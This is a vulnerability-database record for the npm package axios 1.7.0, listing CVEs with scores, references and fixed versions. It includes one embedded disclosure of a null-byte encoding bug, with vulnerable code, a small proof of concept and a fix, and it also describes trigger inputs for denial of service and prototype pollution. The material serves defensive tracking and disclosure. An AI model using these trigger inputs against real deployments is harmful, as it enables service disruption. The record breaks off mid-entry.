Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:npm/axios@1.7.0
Typenpm
Namespace
Nameaxios
Version1.7.0
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version1.16.0
Latest_non_vulnerable_version1.16.0
Affected_by_vulnerabilities
0
url VCID-37kj-pzyt-8be6
vulnerability_id VCID-37kj-pzyt-8be6
summary 
Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig
The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25639
reference_id
reference_type
scores
0
value 0.00044
scoring_system epss
scoring_elements 0.13917
published_at 2026-06-07T12:55:00Z
1
value 0.00044
scoring_system epss
scoring_elements 0.1395
published_at 2026-06-05T12:55:00Z
2
value 0.00044
scoring_system epss
scoring_elements 0.13954
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25639
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57
5
reference_url https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e
6
reference_url https://github.com/axios/axios/pull/7369
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/pull/7369
7
reference_url https://github.com/axios/axios/pull/7388
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/pull/7388
8
reference_url https://github.com/axios/axios/releases/tag/v0.30.3
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/releases/tag/v0.30.3
9
reference_url https://github.com/axios/axios/releases/tag/v1.13.5
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/releases/tag/v1.13.5
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907
reference_id 1127907
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2438237
reference_id 2438237
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2438237
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25639
reference_id CVE-2026-25639
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25639
13
reference_url https://github.com/advisories/GHSA-43fc-jf86-j433
reference_id GHSA-43fc-jf86-j433
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-43fc-jf86-j433
14
reference_url https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433
reference_id GHSA-43fc-jf86-j433
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433
15
reference_url https://access.redhat.com/errata/RHSA-2026:10184
reference_id RHSA-2026:10184
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:10184
16
reference_url https://access.redhat.com/errata/RHSA-2026:11414
reference_id RHSA-2026:11414
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:11414
17
reference_url https://access.redhat.com/errata/RHSA-2026:13542
reference_id RHSA-2026:13542
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:13542
18
reference_url https://access.redhat.com/errata/RHSA-2026:13548
reference_id RHSA-2026:13548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:13548
19
reference_url https://access.redhat.com/errata/RHSA-2026:19712
reference_id RHSA-2026:19712
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19712
20
reference_url https://access.redhat.com/errata/RHSA-2026:2694
reference_id RHSA-2026:2694
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2694
21
reference_url https://access.redhat.com/errata/RHSA-2026:3087
reference_id RHSA-2026:3087
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3087
22
reference_url https://access.redhat.com/errata/RHSA-2026:3105
reference_id RHSA-2026:3105
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3105
23
reference_url https://access.redhat.com/errata/RHSA-2026:3106
reference_id RHSA-2026:3106
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3106
24
reference_url https://access.redhat.com/errata/RHSA-2026:3107
reference_id RHSA-2026:3107
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3107
25
reference_url https://access.redhat.com/errata/RHSA-2026:3109
reference_id RHSA-2026:3109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3109
26
reference_url https://access.redhat.com/errata/RHSA-2026:4942
reference_id RHSA-2026:4942
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4942
27
reference_url https://access.redhat.com/errata/RHSA-2026:5142
reference_id RHSA-2026:5142
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5142
28
reference_url https://access.redhat.com/errata/RHSA-2026:5168
reference_id RHSA-2026:5168
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5168
29
reference_url https://access.redhat.com/errata/RHSA-2026:5174
reference_id RHSA-2026:5174
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5174
30
reference_url https://access.redhat.com/errata/RHSA-2026:5633
reference_id RHSA-2026:5633
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5633
31
reference_url https://access.redhat.com/errata/RHSA-2026:5636
reference_id RHSA-2026:5636
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5636
32
reference_url https://access.redhat.com/errata/RHSA-2026:5665
reference_id RHSA-2026:5665
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5665
33
reference_url https://access.redhat.com/errata/RHSA-2026:5807
reference_id RHSA-2026:5807
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5807
34
reference_url https://access.redhat.com/errata/RHSA-2026:6170
reference_id RHSA-2026:6170
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6170
35
reference_url https://access.redhat.com/errata/RHSA-2026:6174
reference_id RHSA-2026:6174
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6174
36
reference_url https://access.redhat.com/errata/RHSA-2026:6192
reference_id RHSA-2026:6192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6192
37
reference_url https://access.redhat.com/errata/RHSA-2026:6277
reference_id RHSA-2026:6277
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6277
38
reference_url https://access.redhat.com/errata/RHSA-2026:6308
reference_id RHSA-2026:6308
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6308
39
reference_url https://access.redhat.com/errata/RHSA-2026:6309
reference_id RHSA-2026:6309
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6309
40
reference_url https://access.redhat.com/errata/RHSA-2026:6404
reference_id RHSA-2026:6404
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6404
41
reference_url https://access.redhat.com/errata/RHSA-2026:6428
reference_id RHSA-2026:6428
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6428
42
reference_url https://access.redhat.com/errata/RHSA-2026:6497
reference_id RHSA-2026:6497
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6497
43
reference_url https://access.redhat.com/errata/RHSA-2026:6567
reference_id RHSA-2026:6567
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6567
44
reference_url https://access.redhat.com/errata/RHSA-2026:6568
reference_id RHSA-2026:6568
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6568
45
reference_url https://access.redhat.com/errata/RHSA-2026:6802
reference_id RHSA-2026:6802
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6802
46
reference_url https://access.redhat.com/errata/RHSA-2026:7249
reference_id RHSA-2026:7249
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:7249
47
reference_url https://access.redhat.com/errata/RHSA-2026:8218
reference_id RHSA-2026:8218
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8218
48
reference_url https://access.redhat.com/errata/RHSA-2026:8229
reference_id RHSA-2026:8229
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8229
49
reference_url https://access.redhat.com/errata/RHSA-2026:8499
reference_id RHSA-2026:8499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8499
50
reference_url https://access.redhat.com/errata/RHSA-2026:8500
reference_id RHSA-2026:8500
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8500
51
reference_url https://access.redhat.com/errata/RHSA-2026:8501
reference_id RHSA-2026:8501
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8501
52
reference_url https://access.redhat.com/errata/RHSA-2026:9848
reference_id RHSA-2026:9848
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:9848
fixed_packages
0
url pkg:npm/axios@1.13.5
purl pkg:npm/axios@1.13.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4b7a-22xk-gbh9
1
vulnerability VCID-5kg1-k416-dfc1
2
vulnerability VCID-6ru1-uamj-5ud3
3
vulnerability VCID-8a5f-cd5t-mucc
4
vulnerability VCID-gp41-4j8d-37ce
5
vulnerability VCID-hadc-5d2f-gqe6
6
vulnerability VCID-jvs6-8bva-nqb3
7
vulnerability VCID-kwj2-mk8c-4fef
8
vulnerability VCID-rusx-pwdw-zqcj
9
vulnerability VCID-td7u-cct6-bud6
10
vulnerability VCID-vzqt-dj1z-bqa6
11
vulnerability VCID-xdas-dhtb-nuge
12
vulnerability VCID-xg1x-4spz-jucn
13
vulnerability VCID-yu5y-e4bk-zyfp
14
vulnerability VCID-z5pf-pqcd-ckas
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.5
aliases CVE-2026-25639, GHSA-43fc-jf86-j433
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-37kj-pzyt-8be6
1
url VCID-4b7a-22xk-gbh9
vulnerability_id VCID-4b7a-22xk-gbh9
summary axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42039.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42039.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42039
reference_id
reference_type
scores
0
value 0.00031
scoring_system epss
scoring_elements 0.09378
published_at 2026-06-07T12:55:00Z
1
value 0.00031
scoring_system epss
scoring_elements 0.09373
published_at 2026-06-05T12:55:00Z
2
value 0.00031
scoring_system epss
scoring_elements 0.09393
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42039
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42039
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42039
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
5
reference_url https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:14:11Z/
url https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42039
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42039
7
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461630
reference_id 2461630
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461630
9
reference_url https://github.com/advisories/GHSA-62hf-57xw-28j9
reference_id GHSA-62hf-57xw-28j9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-62hf-57xw-28j9
10
reference_url https://access.redhat.com/errata/RHSA-2026:14937
reference_id RHSA-2026:14937
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:14937
11
reference_url https://access.redhat.com/errata/RHSA-2026:16476
reference_id RHSA-2026:16476
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16476
12
reference_url https://access.redhat.com/errata/RHSA-2026:16532
reference_id RHSA-2026:16532
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16532
13
reference_url https://access.redhat.com/errata/RHSA-2026:16534
reference_id RHSA-2026:16534
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16534
14
reference_url https://access.redhat.com/errata/RHSA-2026:16535
reference_id RHSA-2026:16535
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16535
15
reference_url https://access.redhat.com/errata/RHSA-2026:16542
reference_id RHSA-2026:16542
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16542
16
reference_url https://access.redhat.com/errata/RHSA-2026:16874
reference_id RHSA-2026:16874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16874
17
reference_url https://access.redhat.com/errata/RHSA-2026:17468
reference_id RHSA-2026:17468
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17468
18
reference_url https://access.redhat.com/errata/RHSA-2026:17474
reference_id RHSA-2026:17474
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17474
19
reference_url https://access.redhat.com/errata/RHSA-2026:17657
reference_id RHSA-2026:17657
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17657
20
reference_url https://access.redhat.com/errata/RHSA-2026:17699
reference_id RHSA-2026:17699
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17699
21
reference_url https://access.redhat.com/errata/RHSA-2026:19109
reference_id RHSA-2026:19109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19109
22
reference_url https://access.redhat.com/errata/RHSA-2026:19375
reference_id RHSA-2026:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19375
23
reference_url https://access.redhat.com/errata/RHSA-2026:20889
reference_id RHSA-2026:20889
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20889
24
reference_url https://access.redhat.com/errata/RHSA-2026:20938
reference_id RHSA-2026:20938
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20938
25
reference_url https://access.redhat.com/errata/RHSA-2026:21017
reference_id RHSA-2026:21017
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21017
26
reference_url https://access.redhat.com/errata/RHSA-2026:21338
reference_id RHSA-2026:21338
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21338
27
reference_url https://access.redhat.com/errata/RHSA-2026:21772
reference_id RHSA-2026:21772
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21772
28
reference_url https://access.redhat.com/errata/RHSA-2026:22465
reference_id RHSA-2026:22465
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22465
29
reference_url https://access.redhat.com/errata/RHSA-2026:22619
reference_id RHSA-2026:22619
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22619
30
reference_url https://access.redhat.com/errata/RHSA-2026:22629
reference_id RHSA-2026:22629
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22629
31
reference_url https://access.redhat.com/errata/RHSA-2026:22840
reference_id RHSA-2026:22840
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22840
32
reference_url https://access.redhat.com/errata/RHSA-2026:23361
reference_id RHSA-2026:23361
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:23361
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42039, GHSA-62hf-57xw-28j9
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4b7a-22xk-gbh9
2
url VCID-5kg1-k416-dfc1
vulnerability_id VCID-5kg1-k416-dfc1
summary 
Axios: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams
# Vulnerability Disclosure: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams

## Summary

The `encode()` function in `lib/helpers/AxiosURLSearchParams.js` contains a character mapping (`charMap`) at line 21 that **reverses** the safe percent-encoding of null bytes. After `encodeURIComponent('\x00')` correctly produces the safe sequence `%00`, the charMap entry `'%00': '\x00'` converts it back to a raw null byte.

This is a clear encoding defect: every other charMap entry encodes in the safe direction (literal → percent-encoded), while this single entry decodes in the opposite (dangerous) direction.

**Severity:** Low (CVSS 3.7)
**Affected Versions:** All versions containing this charMap entry
**Vulnerable Component:** `lib/helpers/AxiosURLSearchParams.js:21`

## CWE

- **CWE-626:** Null Byte Interaction Error (Poison Null Byte)
- **CWE-116:** Improper Encoding or Escaping of Output

## CVSS 3.1

**Score: 3.7 (Low)**

Vector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N`

| Metric | Value | Justification |
|---|---|---|
| Attack Vector | Network | Attacker controls input parameters remotely |
| Attack Complexity | High | Standard axios request flow (`buildURL`) uses its own `encode` function which does NOT have this bug. Only triggered via direct `AxiosURLSearchParams.toString()` without an encoder, or via custom `paramsSerializer` delegation |
| Privileges Required | None | No authentication needed |
| User Interaction | None | No user interaction required |
| Scope | Unchanged | Impact limited to HTTP request URL |
| Confidentiality | None | No confidentiality impact |
| Integrity | Low | Null byte in URL can cause truncation in C-based backends, but requires a vulnerable downstream parser |
| Availability | None | No availability impact |

## Vulnerable Code

**File:** `lib/helpers/AxiosURLSearchParams.js`, lines 13-26

```javascript
function encode(str) {
  const charMap = {
    '!': '%21',     // literal → encoded (SAFE direction)
    "'": '%27',     // literal → encoded (SAFE direction)
    '(': '%28',     // literal → encoded (SAFE direction)
    ')': '%29',     // literal → encoded (SAFE direction)
    '~': '%7E',     // literal → encoded (SAFE direction)
    '%20': '+',     // standard transformation (SAFE)
    '%00': '\x00',  // LINE 21: encoded → raw null byte (UNSAFE direction!)
  };
  return encodeURIComponent(str).replace(/[!'()~]|%20|%00/g, function replacer(match) {
    return charMap[match];
  });
}
```

### Why the Standard Flow Is NOT Affected

```javascript
// buildURL.js:36 — uses its OWN encode function (lines 14-20), not AxiosURLSearchParams's
const _encode = (options && options.encode) || encode;  // buildURL's encode

// buildURL.js:53 — passes buildURL's encode to AxiosURLSearchParams
new AxiosURLSearchParams(params, _options).toString(_encode);  // external encoder used

// AxiosURLSearchParams.js:48 — when encoder is provided, internal encode is NOT used
const _encode = encoder ? function(value) { return encoder.call(this, value, encode); } : encode;
//                                                                              ^^^^^^
//                                           internal encode passed as 2nd arg but only used if
//                                           the external encoder explicitly delegates to it
```

## Proof of Concept

```javascript
import AxiosURLSearchParams from './lib/helpers/AxiosURLSearchParams.js';
import buildURL from './lib/helpers/buildURL.js';

// Test 1: Direct AxiosURLSearchParams (VULNERABLE path)
const params = new AxiosURLSearchParams({ file: 'test\x00.txt' });
const result = params.toString();  // NO encoder → uses internal encode with charMap
console.log('Direct toString():', JSON.stringify(result));
// Output: "file=test\u0000.txt" (contains raw null byte)
console.log('Hex:', Buffer.from(result).toString('hex'));
// Output: 66696c653d74657374002e747874  (00 = null byte)

// Test 2: Via buildURL (NOT vulnerable — standard axios flow)
const url = buildURL('http://example.com/api', { file: 'test\x00.txt' });
console.log('Via buildURL:', url);
// Output: http://example.com/api?file=test%00.txt  (%00 preserved safely)
```

## Verified PoC Output

```
Direct toString(): "file=test\u0000.txt"
Contains raw null byte: true
Hex: 66696c653d74657374002e747874

Via buildURL: http://example.com/api?file=test%00.txt
Contains raw null byte: false
Contains safe %00: true
```

## Impact Analysis

**Primary impact is limited** because the standard axios request flow is not affected. However:

- **Direct API users:** Applications using `AxiosURLSearchParams` directly for custom serialization are affected
- **Custom paramsSerializer:** A `paramsSerializer.encode` that delegates to the internal encoder triggers the bug
- **Code defect signal:** The directional inconsistency in charMap is a clear coding error with no legitimate use case

If null bytes reach a downstream C-based parser, impacts include URL truncation, WAF bypass, and log injection.

## Recommended Fix

Remove the `%00` entry from charMap and update the regex:

```javascript
function encode(str) {
  const charMap = {
    '!': '%21',
    "'": '%27',
    '(': '%28',
    ')': '%29',
    '~': '%7E',
    '%20': '+',
    // REMOVED: '%00': '\x00'
  };
  return encodeURIComponent(str).replace(/[!'()~]|%20/g, function replacer(match) {
    //                                           ^^^^ removed |%00
    return charMap[match];
  });
}
```

## Resources

- [CWE-626: Null Byte Interaction Error](https://cwe.mitre.org/data/definitions/626.html)
- [CWE-116: Improper Encoding or Escaping of Output](https://cwe.mitre.org/data/definitions/116.html)
- [OWASP: Embedding Null Code](https://owasp.org/www-community/attacks/Embedding_Null_Code)
- [Axios GitHub Repository](https://github.com/axios/axios)

## Timeline

| Date | Event |
|---|---|
| 2026-04-15 | Vulnerability discovered during source code audit |
| 2026-04-16 | Report revised: documented standard-flow limitation, corrected CVSS |
| TBD | Report submitted to vendor via GitHub Security Advisory |
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42040
reference_id
reference_type
scores
0
value 0.00083
scoring_system epss
scoring_elements 0.24299
published_at 2026-06-05T12:55:00Z
1
value 0.00083
scoring_system epss
scoring_elements 0.24226
published_at 2026-06-07T12:55:00Z
2
value 0.00083
scoring_system epss
scoring_elements 0.24281
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42040
1
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42040
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42040
2
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
3
reference_url https://github.com/axios/axios/security/advisories/GHSA-xhjh-pmcv-23jw
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:48:02Z/
url https://github.com/axios/axios/security/advisories/GHSA-xhjh-pmcv-23jw
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42040
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42040
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
6
reference_url https://github.com/advisories/GHSA-xhjh-pmcv-23jw
reference_id GHSA-xhjh-pmcv-23jw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xhjh-pmcv-23jw
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42040, GHSA-xhjh-pmcv-23jw
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5kg1-k416-dfc1
3
url VCID-6ru1-uamj-5ud3
vulnerability_id VCID-6ru1-uamj-5ud3
summary axios: Axios: HTTP Transport Hijacking via Prototype Pollution
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42033.json
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42033.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42033
reference_id
reference_type
scores
0
value 0.00059
